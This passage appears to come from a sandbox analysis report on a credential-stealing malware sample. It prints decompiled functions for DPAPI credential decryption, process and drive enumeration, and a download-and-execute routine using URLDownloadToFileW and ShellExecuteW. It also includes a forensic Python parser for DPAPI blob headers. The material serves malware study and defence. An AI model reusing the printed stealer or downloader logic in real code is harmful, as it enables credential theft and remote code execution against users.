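Non-v10 blobs are only classified here; the sample's fallback branch (E0040C1DD, and the CryptUnprotectData wrapper E00409D97 later in this section) needs the DPAPI master key of the victim's session and has no offline equivalent.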

                                  C-Code - Quality: 100%
                                  			E0041405F(void* __ecx, void* __eflags) {
                                  				char _v264;
                                  				intOrPtr _v292;
                                  				void* _v300;
                                  				int _t11;
                                  				void* _t22;
                                  
                                  				_t22 = CreateToolhelp32Snapshot(2, 0);                 // TH32CS_SNAPPROCESS
                                  				E00401052( &_v300, 0, 0x128);                          // memset(&pe32, 0, sizeof(PROCESSENTRY32))
                                  				_v300 = 0x128;                                         // pe32.dwSize
                                  				_t11 = Process32First(_t22,  &_v300);
                                  				while(_t11 != 0) {
                                  					if(E00401176( &_v264, "explorer.exe") == 0) {      // compare against pe32.szExeFile
                                  						return _v292;                                  // pe32.th32ProcessID; the snapshot handle is not closed on this path
                                  					}
                                  					_t11 = Process32Next(_t22,  &_v300);
                                  				}
                                  				CloseHandle(_t22);
                                  				return 0;
                                  			}

                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041406E
                                  • Process32First.KERNEL32(00000000,?), ref: 0041409B
                                  • Process32Next.KERNEL32(00000000,?), ref: 004140C2
                                  • CloseHandle.KERNEL32(00000000), ref: 004140CD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID: explorer.exe
                                  • API String ID: 420147892-3187896405
                                  • Opcode ID: a7811eb097bfb4c1731681bec79869e76dd77b3fb60978c9c8995b6681227ad2
                                  • Instruction ID: ea809b74c35a4b4e8447ab93d020d769017f33877584137915eab964d6a7a943
                                  • Opcode Fuzzy Hash: a7811eb097bfb4c1731681bec79869e76dd77b3fb60978c9c8995b6681227ad2
                                  • Instruction Fuzzy Hash: CB01A972505114ABD7209761EC09FDB77FCDF49310F1040B6FA45E21C0EA78DAD58A6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 24%
                                  			E00409D97(intOrPtr __ecx, WCHAR* __edx, void* __eflags, intOrPtr _a4) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				char _v16;
                                  				intOrPtr _v20;
                                  				char _v24;
                                  				char _v8216;
                                  				char* _t24;
                                  				signed int _t27;
                                  				WCHAR* _t29;
                                  				intOrPtr _t30;
                                  				signed int* _t31;
                                  				intOrPtr _t32;
                                  				void* _t34;
                                  				intOrPtr _t35;
                                  				intOrPtr _t36;
                                  				void* _t38;
                                  				void* _t39;
                                  
                                  				_t30 = __ecx;
                                  				E004011C0(0x2014, __ecx);
                                  				_t36 = _a4;
                                  				_t29 = __edx;
                                  				_v8 = _t30;
                                  				_t3 = _t36 - 1; // -1
                                  				_t34 = GlobalAlloc(0x40, _t3);                          // GPTR buffer for the input minus its first byte
                                  				_t38 = 1;
                                  				if(_t36 > 1) {
                                  					_t32 = _v8;
                                  					do {
                                  						 *((char*)(_t34 + _t38 - 1)) =  *((intOrPtr*)(_t38 + _t32));
                                  						_t38 = _t38 + 1;
                                  					} while (_t38 < _t36);
                                  				}
                                  				_t8 = _t36 - 1; // -1
                                  				_v12 = _t34;                                            // DATA_BLOB.pbData: input bytes [1 .. len-1]
                                  				_v16 = _t8;                                             // DATA_BLOB.cbData
                                  				_t39 = 0;
                                  				_t24 =  &_v16;
                                  				__imp__CryptUnprotectData(_t24, 0, 0, 0, 0, 0,  &_v24); // DPAPI decrypt under the current user's key; output blob in _v24/_v20
                                  				if(_t24 == 0) {
                                  					_push(L"Could not decrypt");                        // literal returned to the caller on failure
                                  				} else {
                                  					if(_t36 > 0) {
                                  						_t35 = _v20;                                    // decrypted bytes
                                  						_t31 =  &_v8216;                                // 8 KB wide-char output buffer
                                  						do {                                            // widen byte by byte; bounded by the input length, not by cbData
                                  							_t27 =  *(_t35 + _t39) & 0x000000ff;
                                  							_t39 = _t39 + 2;
                                  							 *_t31 = _t27;
                                  							_t31 =  &(_t31[0]);
                                  						} while (_t39 < _t36);
                                  					}
                                  					_push( &_v8216);
                                  				}
                                  				return lstrcpyW(_t29, ??);
                                  			}

                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,-00000001,74A345FD,?,?,?,00409D4B,00001000,?,00000000,00001000), ref: 00409DB5
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00409D4B), ref: 00409DEB
                                  • lstrcpyW.KERNEL32(?,Could not decrypt), ref: 00409E22
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocCryptDataGlobalUnprotectlstrcpy
                                  • String ID: Could not decrypt
                                  • API String ID: 3112367126-1484008118
                                  • Opcode ID: a053b4f1fbd8e89e50c43ed9a83f9f24782582740e94a77ed331465ef246dd5e
                                  • Instruction ID: aa4716c66a3a11094124d3c9fea6a44173f7715366435e59aa3e46d54874a9c7
                                  • Opcode Fuzzy Hash: a053b4f1fbd8e89e50c43ed9a83f9f24782582740e94a77ed331465ef246dd5e
                                  • Instruction Fuzzy Hash: 6E11C676904219ABC711CB99C8809EFF7BCEF88704B1045BBE955F7292E6359E01CBE4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00410A8C(void* __ecx, void* __eflags) {
                                  				void* _v8;
                                  				short _v12;
                                  				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                  				long _v20;
                                  				long _v24;
                                  				union _SID_NAME_USE _v28;
                                  				short _v60;
                                  				short _v580;
                                  				void* _t37;
                                  
                                  				_v20 = 0x10;
                                  				_v8 = 0;
                                  				_t37 = __ecx;
                                  				_v16.Value = 0;
                                  				_v12 = 0x500;
                                  				E00401052( &_v580, 0, 0x208);
                                  				_v24 = 0x104;
                                  				if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v8) == 0 || LookupAccountSidW(0, _v8,  &_v580,  &_v24,  &_v60,  &_v20,  &_v28) == 0) {
                                  					GetLastError();
                                  				}
                                  				if(_v8 != 0) {
                                  					FreeSid(_v8);
                                  				}
                                  				E004036F7(_t37,  &_v580);
                                  				return _t37;
			}

                                  APIs
                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0040D311,?,?,00000001), ref: 00410AE1
                                  • LookupAccountSidW.ADVAPI32(00000000,0040D311,?,00000104,?,00000010,?), ref: 00410B06
                                  • GetLastError.KERNEL32(?,?,00000001), ref: 00410B10
                                  • FreeSid.ADVAPI32(0040D311,?,?,00000001), ref: 00410B1E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AccountAllocateErrorFreeInitializeLastLookup
                                  • String ID:
                                  • API String ID: 1866703397-0
                                  • Opcode ID: a99fe88b912b9a90b46e4a78fd4ea3cd93b49c87cff4e41624bf92df729e9547
                                  • Instruction ID: 268544a994eea4337760f271e77acc5a4e560188a377bc451064b1715e62684d
                                  • Opcode Fuzzy Hash: a99fe88b912b9a90b46e4a78fd4ea3cd93b49c87cff4e41624bf92df729e9547
                                  • Instruction Fuzzy Hash: 0C11FE71A0020DABDB10DFD0DC89EEFB7BCEB08344F004476F205E2190D7749A849B65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E0040C3B9(intOrPtr __ecx, void** __edx, long* _a4) {
                                  				intOrPtr _v8;
                                  				void* _t6;
                                  				void* _t8;
                                  				long* _t9;
                                  				void* _t13;
                                  				void** _t14;
                                  				void* _t16;
                                  				void* _t17;
                                  
                                  				_t9 = _a4;
                                  				_t17 = 0;
                                  				_v8 = __ecx;
                                  				_t14 = __edx;
                                  				 *_t9 = 0;
                                  				 *((intOrPtr*)(__edx)) = 0;
                                  				__imp__CryptStringToBinaryW(__ecx, 0, 1, 0, _t9, 0, 0, _t13, _t16, _t8, __ecx);
                                  				if(__ecx != 0) {
                                  					_t6 = LocalAlloc(0x40,  *_t9);
                                  					 *_t14 = _t6;
                                  					if(_t6 != 0) {
                                  						__imp__CryptStringToBinaryW(_v8, 0, 1, _t6, _t9, 0, 0);
                                  						_t17 = _t6;
                                  						if(_t17 == 0) {
                                  							 *_t14 = LocalFree( *_t14);
                                  						}
                                  					}
                                  				}
                                  				return _t17;
			}

                                  APIs
                                  • CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3D8
                                  • LocalAlloc.KERNEL32(00000040,?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C3E6
                                  • CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3FC
                                  • LocalFree.KERNEL32(?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C40A
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID:
                                  • API String ID: 4291131564-0
                                  • Opcode ID: de5d65555f31f5c98b5c1a3d0e77876cadd448468ad4c2dd5e4a6cd100e7a101
                                  • Instruction ID: 97c3cc2928edf4510a7e7d2c17aa5025b134dfc6b4fce315ddd3b78eefc3bfdb
                                  • Opcode Fuzzy Hash: de5d65555f31f5c98b5c1a3d0e77876cadd448468ad4c2dd5e4a6cd100e7a101
                                  • Instruction Fuzzy Hash: A6011D71641231BFD7214B569C49EA7BFACEF497E0B108131F948E6290D7B18D00DAA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 92%
                                  			E0040290E(void* __ecx, void* __eflags, signed int _a4) {
                                  				short* _v12;
                                  				void* _v16;
                                  				char _v20;
                                  				void* _t26;
                                  				void* _t36;
                                  				void* _t38;
                                  				void* _t42;
                                  				void* _t58;
                                  				void* _t59;
                                  
                                  				_t66 = __eflags;
                                  				_t42 = __ecx;
                                  				_t58 = 0x1a;
                                  				E00410C8A( &_v12, _t58, __eflags);
                                  				_t59 = 0xa;
                                  				_t26 = E004035B9( &_v16, _t59, __eflags);
                                  				E00403447(E0040357C( &_v12, _t59, _t66, "\\"), _t66, _t26);
                                  				E00405FEB(_v16);
                                  				_t61 = _a4 + 4;
                                  				E0040373F( &_v16, _a4 + 4);
                                  				E00403447( &_v12, _t66, E0040362F( &_v16,  &_a4));
                                  				E00405FEB(_a4);
                                  				_a4 = _a4 & 0x00000000;
                                  				E00405FEB(_v16);
                                  				_t36 = E0040373F( &_a4, _t61);
                                  				__imp__URLDownloadToFileW(0, _a4, _v12, 0, 0);
                                  				E00405FEB(_a4);
                                  				if(_t36 == 0) {
                                  					_t38 = ShellExecuteW(0, L"open", _v12, 0, 0, 5);
                                  					_v16 = 2;
                                  					__eflags = _t38 - 0x20;
                                  					if(_t38 > 0x20) {
                                  						_v16 = 0;
                                  					}
                                  				} else {
                                  					_v16 = 1;
                                  				}
                                  				_v20 = 0x417810;
                                  				E00405044(_t42,  &_v20);
                                  				return E00405FEB(_v12);
			}

                                  APIs
                                    • Part of subcall function 00410C8A: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 00410CBB
                                    • Part of subcall function 00403447: lstrcatW.KERNEL32 ref: 00403477
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,74A313FB), ref: 00403769
                                    • Part of subcall function 0040362F: PathFindExtensionW.SHLWAPI(?), ref: 00403639
                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0040299B
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 004029C5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Path$DownloadExecuteExtensionFileFindFolderFreeShellSpecialVirtuallstrcatlstrcpy
                                  • String ID: open
                                  • API String ID: 4166385161-2758837156
                                  • Opcode ID: d995fef18129c4f08e864c21fee30d5446cd9e6673a4ce1fd4005cf7ffc9c6cf
                                  • Instruction ID: 7d7fc589e9963d25af6e0cc8dd23fda473545fd51eb9e29652c6e1dbcd1770d4
                                  • Opcode Fuzzy Hash: d995fef18129c4f08e864c21fee30d5446cd9e6673a4ce1fd4005cf7ffc9c6cf
                                  • Instruction Fuzzy Hash: 18214F71A00108BBCB15AFA6C885EEE7B78EF84759F00406AF416772C1DB785645CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040EDA9(intOrPtr* __ecx, char __edx) {
                                  				char _v12;
                                  				long _v16;
                                  				intOrPtr _v20;
                                  				char _v24;
                                  				intOrPtr _v28;
                                  				char _v32;
                                  				intOrPtr _v52;
                                  				void _v56;
                                  				void* _t14;
                                  				intOrPtr _t17;
                                  				union _PROCESSINFOCLASS _t20;
                                  				intOrPtr* _t29;
                                  				intOrPtr _t31;
                                  
                                  				_t29 = __ecx;
                                  				_v12 = __edx;
                                  				_t20 = 0;
                                  				_t31 = 1;
                                  				if( *__ecx != 1) {
                                  					_t14 = GetCurrentProcess();
                                  					_t31 =  *_t29;
                                  				} else {
                                  					_t14 =  *( *(__ecx + 4));
                                  				}
                                  				_v32 = _v12;
                                  				_v28 = 0x426970;
                                  				_v20 = _t29;
                                  				if(_t31 == 1 && NtQueryInformationProcess(_t14, _t20,  &_v56, 0x18,  &_v16) >= 0 && _v16 == 0x18) {
                                  					_t17 = _v52;
                                  					if(_t17 != 0) {
                                  						_t11 =  &_v24; // 0x40ec60
                                  						_v24 = _t17;
                                  						_t20 = E0040EE24( &_v32, _t11, 0x150);
                                  					}
                                  				}
                                  				return _t20;
			}

                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000001,C0000135,0040EAD8,?,?,?,?,?,?,?,?,?,0040EC60,?,00000000,?), ref: 0040EDC7
                                  • NtQueryInformationProcess.NTDLL ref: 0040EDF0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process$CurrentInformationQuery
                                  • String ID: `@
                                  • API String ID: 3953534283-951712118
                                  • Opcode ID: 3907fd75677dc873825907a835a0b947a967a032764e8d362cafd5afed52a1bb
                                  • Instruction ID: 3ac64283fd91789c4a21a164da3f73717bcde32abe73c1a33020f5e4c519176d
                                  • Opcode Fuzzy Hash: 3907fd75677dc873825907a835a0b947a967a032764e8d362cafd5afed52a1bb
                                  • Instruction Fuzzy Hash: C0016171E00219AFDB04CF96D8848AFB7B9EB44351B10447AE511B7280D7745E54CFE4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E0041154A(intOrPtr __ecx, void* __eflags) {
                                  				void* _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				int _v20;
                                  				WCHAR* _v24;
                                  				intOrPtr _v28;
                                  				signed int _v32;
                                  				intOrPtr _v36;
                                  				char _v40;
                                  				WCHAR* _t33;
                                  				intOrPtr _t34;
                                  				int _t44;
                                  				WCHAR* _t54;
                                  				signed int _t72;
                                  				intOrPtr _t74;
                                  				int _t75;
                                  				long _t76;
                                  				WCHAR* _t77;
                                  				void* _t78;
                                  				void* _t79;
                                  
                                  				_t74 = __ecx;
                                  				_v12 = __ecx;
                                  				_t33 = E00406099(0x208);
                                  				_v32 = _v32 & 0x00000000;
                                  				_t54 = _t33;
                                  				_t34 = 5;
                                  				_v28 = _t34;
                                  				_v36 = _t34;
                                  				E00401A48( &_v40, __eflags);
                                  				_t76 = GetLogicalDriveStringsW(0x104, _t54);
                                  				_t81 = _t76 - 0x104;
                                  				if(_t76 > 0x104) {
                                  					_t72 = 2;
                                  					_t54 = E00406099( ~(0 | _t81 > 0x00000000) | _t36 * _t72);
                                  					GetLogicalDriveStringsW(_t76, _t54);
                                  				}
                                  				_t77 = 0;
                                  				if( *_t54 != 0) {
                                  					do {
                                  						_v24 = _t77;
                                  						E00403549( &_v24, E004036F7( &_v8, _t54));
                                  						E00405FEB(_v8);
                                  						_v8 = _t77;
                                  						_t44 = GetDriveTypeW(_v24);
                                  						_t79 = _t79 - 0xc;
                                  						_t75 = _t44;
                                  						_t78 = _t79;
                                  						_v20 = _t75;
                                  						E0040373F(_t78,  &_v24);
                                  						 *(_t78 + 4) = _t75;
                                  						 *((intOrPtr*)(_t78 + 8)) = _v16;
                                  						E00401955( &_v40);
                                  						_t54 =  &(( &(_t54[E00403373( &_v24)]))[1]);
                                  						E00405FEB(_v24);
                                  						_t77 = 0;
                                  						_v24 = 0;
                                  						_t84 =  *_t54;
                                  					} while ( *_t54 != 0);
                                  					_t74 = _v12;
                                  				}
                                  				E004013FA(_t74, _t84,  &_v40);
                                  				_t60 = _v40;
                                  				if(_v40 != 0) {
                                  					E00401B52(_t60, _t60);
                                  				}
                                  				return _t74;
			}

                                  APIs
                                    • Part of subcall function 00406099: GetProcessHeap.KERNEL32(00000000,000000F4,00411996,?,74A313FB,00000000,00405B72), ref: 0040609C
                                    • Part of subcall function 00406099: HeapAlloc.KERNEL32(00000000), ref: 004060A3
                                  • GetLogicalDriveStringsW.KERNEL32(00000104,00000000), ref: 0041157F
                                  • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 004115A6
                                  • GetDriveTypeW.KERNEL32(?,00000000,00000000), ref: 004115D6
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Drive$HeapLogicalStrings$AllocProcessType
                                  • String ID:
                                  • API String ID: 2408535517-0
                                  • Opcode ID: c0c5c8e7104723ce3d4df7f61cac7c8c28d5f35411cc5e1ac6e0b4cadadba7b3
                                  • Instruction ID: 005d507b96d77ad3cbaae5a347880d44af72ce3ccef8451c39d33109e0eb80f3
                                  • Opcode Fuzzy Hash: c0c5c8e7104723ce3d4df7f61cac7c8c28d5f35411cc5e1ac6e0b4cadadba7b3
                                  • Instruction Fuzzy Hash: 2F318471E00219ABCF14EFA5D5869EFB7B8EF44305F10007EE502B7291DB785E418BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 92%
                                  			E0040A8C3(void* __ecx, void* __eflags, CHAR* _a4, CHAR** _a8) {
                                  				int _v8;
                                  				DWORD* _v12;
                                  				DWORD* _v16;
                                  				void* _v20;
                                  				int _v24;
                                  				BYTE* _v28;
                                  				char _v32;
                                  				char _v8128;
                                  				int _t27;
                                  				CHAR* _t39;
                                  				void* _t43;
                                  
                                  				_t43 = __ecx;
                                  				E004011C0(0x1fbc, __ecx);
                                  				_v8 = 0x1fa0;
                                  				_t27 = lstrlenA(_a4);
                                  				E00401052( &_v8128, 0, 0x1fa0);
                                  				CryptStringToBinaryA(_a4, _t27, 1,  &_v8128,  &_v8, 0, 0);
                                  				_v32 = 0;
                                  				_v28 =  &_v8128;
                                  				_v24 = _v8;
                                  				_v16 = 0;
                                  				_v12 = 0;
                                  				_v20 = 0;
                                  				 *((intOrPtr*)(_t43 + 0x70))( &_v32,  &_v20, 0);
                                  				 *((char*)(_v12 + _v16)) = 0;
                                  				_t39 = E00405FFA(_v12 + 1);
                                  				 *_a8 = _t39;
                                  				return lstrcpyA(_t39, _v16);
			}

                                  APIs
                                  • lstrlenA.KERNEL32(?,?,?,00000000,?,0040A1B0,?,?,?,?,?,encryptedUsername,?,?,00000000,C0000000), ref: 0040A8E0
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0040A90E
                                    • Part of subcall function 00405FFA: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00403764,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,74A313FB,00000000), ref: 00406004
                                  • lstrcpyA.KERNEL32(00000000,?), ref: 0040A95B
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocBinaryCryptStringVirtuallstrcpylstrlen
                                  • String ID:
                                  • API String ID: 573875632-0
                                  • Opcode ID: a7fcee0eccf1bffdf81db819550e444e68a458b4b19a0c296c275230d11a1816
                                  • Instruction ID: 46e43b13d17251deba087c8a1c7344e77a636f034bd5f4a2403ed6c43e9bde0d
                                  • Opcode Fuzzy Hash: a7fcee0eccf1bffdf81db819550e444e68a458b4b19a0c296c275230d11a1816
                                  • Instruction Fuzzy Hash: D811D6B6D00209AFCB01DFA5D8848EEBBB8EF08344F1080BAF509A2251D7359A05CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E0040C261(intOrPtr __ecx, char __edx, intOrPtr _a20, void** _a24, long* _a28) {
                                  				void* _v8;
                                  				long _v12;
                                  				char _v16;
                                  				char _v20;
                                  				intOrPtr _v24;
                                  				char _v28;
                                  				char* _t16;
                                  				void* _t18;
                                  				long _t23;
                                  				char* _t26;
                                  
                                  				_v24 = __ecx;
                                  				_v28 = __edx;
                                  				_v20 = 0;
                                  				_t16 =  &_v28;
                                  				_v16 = 0;
                                  				__imp__CryptUnprotectData(_t16, 0,  &_v20, 0, 0, _a20,  &_v12);
                                  				_t26 = _t16;
                                  				if(_t26 != 0) {
                                  					_t23 = _v12;
                                  					_t27 = _a28;
                                  					 *_a28 = _t23;
                                  					_t18 = LocalAlloc(0x40, _t23);
                                  					 *_a24 = _t18;
                                  					if(_t18 != 0) {
                                  						E0040102C(_t18, _v8,  *_t27);
                                  					}
                                  					LocalFree(_v8);
                                  				}
                                  				return _t26;
                                  			}
                                  Instruction addresses: 0x0040c26c, 0x0040c275, 0x0040c27d, 0x0040c282, 0x0040c285, 0x0040c289, 0x0040c28f, 0x0040c293, 0x0040c295, 0x0040c298, 0x0040c29e, 0x0040c2a0, 0x0040c2a9, 0x0040c2ad, 0x0040c2b5, 0x0040c2ba, 0x0040c2c0, 0x0040c2c0, 0x0040c2cb

                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?), ref: 0040C289
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,0040C23A,?,00000000,?,?,?,?,0040C1A9), ref: 0040C2A0
                                  • LocalFree.KERNEL32(0040C23A,?,?,?,?,?,0040C23A,?,00000000,?,?,?,?,0040C1A9), ref: 0040C2C0
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: 14d5045bb1e80aca1f29e39f07986aad29e0176d729f2c70d7d51fb657e4aaa2
                                  • Instruction ID: 1d902f39b8868da73aad002a3a3bcb34f53c3eebdb7f7a81f2f30e2d950ee71b
                                  • Opcode Fuzzy Hash: 14d5045bb1e80aca1f29e39f07986aad29e0176d729f2c70d7d51fb657e4aaa2
                                  • Instruction Fuzzy Hash: 4C0108B9900209AFDB059FA4DC4A8EFBBB9EB48310B10016EFD41A2350E7759A448AA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%
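
The blob that E0040C261 hands to CryptUnprotectData (zeroed optional-entropy blob, output copied into a LocalAlloc buffer) is a standard DPAPI CRYPTPROTECT blob, which CryptUnprotectData can only open with the master key of the user who protected it. That is why the stealer decrypts on the victim host instead of exfiltrating raw blobs. The parser below is an added example for this report, not code from the sample or the sandbox: it reads the public CRYPTPROTECT blob layout (as documented by dpapick and mimikatz) and reports the master-key GUID, description and algorithm IDs, which is what an analyst needs to pick the right master-key file under %APPDATA%\Microsoft\Protect\<SID>\ when triaging recovered credential stores. The sample blob at the bottom is constructed; its field values are made up and it is not a real credential.

```python
"""DPAPI CRYPTPROTECT blob header parser (added example, standard library only)."""
import struct
import uuid

# Provider GUID present at offset 4 of every DPAPI blob.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")

# CryptoAPI ALG_ID values commonly found in DPAPI blobs.
ALG_NAMES = {
    0x6603: "CALG_3DES",
    0x6610: "CALG_AES_256",
    0x8004: "CALG_SHA1",
    0x800E: "CALG_SHA_512",
}


class _Reader:
    """Sequential little-endian reader with bounds checks."""

    def __init__(self, data):
        self.data, self.pos = data, 0

    def raw(self, n):
        if n < 0 or self.pos + n > len(self.data):
            raise ValueError("truncated DPAPI blob")
        chunk = self.data[self.pos:self.pos + n]
        self.pos += n
        return chunk

    def u32(self):
        return struct.unpack("<I", self.raw(4))[0]

    def counted(self):
        # DWORD length followed by that many bytes
        return self.raw(self.u32())


def parse_dpapi_blob(blob):
    """Return the header fields of a CRYPTPROTECT blob as a dict."""
    r = _Reader(blob)
    version = r.u32()
    provider = uuid.UUID(bytes_le=r.raw(16))
    if version != 1 or provider != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob (bad version or provider GUID)")
    mk_version = r.u32()
    mk_guid = uuid.UUID(bytes_le=r.raw(16))       # master key needed to decrypt
    flags = r.u32()
    description = r.counted().decode("utf-16-le").rstrip("\x00")
    alg_crypt, key_bits = r.u32(), r.u32()
    salt = r.counted()
    r.counted()                                   # first HMAC key field, normally empty
    alg_hash, hash_bits = r.u32(), r.u32()
    hmac2_key = r.counted()
    ciphertext = r.counted()
    signature = r.counted()
    return {
        "master_key_version": mk_version,
        "master_key_guid": str(mk_guid),
        "flags": flags,
        "description": description,
        "alg_crypt": ALG_NAMES.get(alg_crypt, hex(alg_crypt)),
        "key_bits": key_bits,
        "alg_hash": ALG_NAMES.get(alg_hash, hex(alg_hash)),
        "hash_bits": hash_bits,
        "salt": salt.hex(),
        "hmac2_key_len": len(hmac2_key),
        "ciphertext_len": len(ciphertext),
        "signature_len": len(signature),
    }


def build_sample_blob():
    """Constructed test vector: real layout, made-up contents (not a real credential)."""
    def counted(b):
        return struct.pack("<I", len(b)) + b

    mk_guid = uuid.UUID("0b5a1f5c-3a9b-4c58-9f2e-1d6f0a7c4e21")   # made up
    description = "Constructed test vector\x00".encode("utf-16-le")
    return (
        struct.pack("<I", 1) + DPAPI_PROVIDER_GUID.bytes_le
        + struct.pack("<I", 1) + mk_guid.bytes_le
        + struct.pack("<I", 0)
        + counted(description)
        + struct.pack("<II", 0x6610, 256) + counted(b"\x11" * 32)   # AES-256, salt
        + counted(b"")
        + struct.pack("<II", 0x800E, 512) + counted(b"")            # SHA-512
        + counted(b"\x22" * 48)                                     # ciphertext
        + counted(b"\x33" * 64)                                     # signature
    )


if __name__ == "__main__":
    for key, value in parse_dpapi_blob(build_sample_blob()).items():
        print(f"{key:>18}: {value}")
```

Run it against a blob carved from a Chrome "Login Data" database or a Credential Manager file and the master_key_guid field names the file under the user's Protect directory; without that master key (or the user's password / the domain backup key) the ciphertext is not recoverable offline.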

                                  C-Code - Quality: 72%
                                  			E00411446(void* __ecx, void* __eflags, WCHAR* _a4) {
                                  				signed int _v12;
                                  				intOrPtr _v16;
                                  				signed int _v20;
                                  				intOrPtr _v24;
                                  				char _v28;
                                  				signed int _v40;
                                  				intOrPtr _v44;
                                  				intOrPtr _v48;
                                  				signed int _v56;
                                  				struct _WIN32_FIND_DATAW _v648;
                                  				intOrPtr _t39;
                                  				void* _t62;
                                  				void* _t75;
                                  				void* _t76;
                                  				void* _t77;
                                  				void* _t79;
                                  
                                  				_v20 = _v20 & 0x00000000;
                                  				_t39 = 5;
                                  				_t75 = __ecx;
                                  				_v16 = _t39;
                                  				_v24 = _t39;
                                  				E004018C7( &_v28, __eflags);
                                  				_t62 = FindFirstFileW(_a4,  &_v648);
                                  				_t79 = _t62 - 0xffffffff;
                                  				while(_t79 != 0) {
                                  					_v56 = _v56 & 0x00000000;
                                  					__eflags = _v648.dwFileAttributes & 0x00000010;
                                  					if((_v648.dwFileAttributes & 0x00000010) == 0) {
                                  						_t16 =  &_v40;
                                  						 *_t16 = _v40 & 0x00000000;
                                  						__eflags =  *_t16;
                                  						_v48 = _v648.nFileSizeLow;
                                  						_v44 = _v648.nFileSizeHigh;
                                  					} else {
                                  						asm("xorps xmm0, xmm0");
                                  						_v40 = 1;
                                  						asm("movlpd [ebp-0x2c], xmm0");
                                  					}
                                  					E00403549( &_v56, E004036F7( &_v12,  &(_v648.cFileName)));
                                  					E00405FEB(_v12);
                                  					_v12 = _v12 & 0x00000000;
                                  					_t77 = _t77 - 0x18;
                                  					_t76 = _t77;
                                  					E0040373F(_t76,  &_v56);
                                  					 *((intOrPtr*)(_t76 + 8)) = _v48;
                                  					 *((intOrPtr*)(_t76 + 0xc)) = _v44;
                                  					 *(_t76 + 0x10) = _v40;
                                  					E004017C8( &_v28);
                                  					E00405FEB(_v56);
                                  					__eflags = FindNextFileW(_t62,  &_v648);
                                  				}
                                  				E004013B3(_t75, _t79,  &_v28);
                                  				_t73 = _v28;
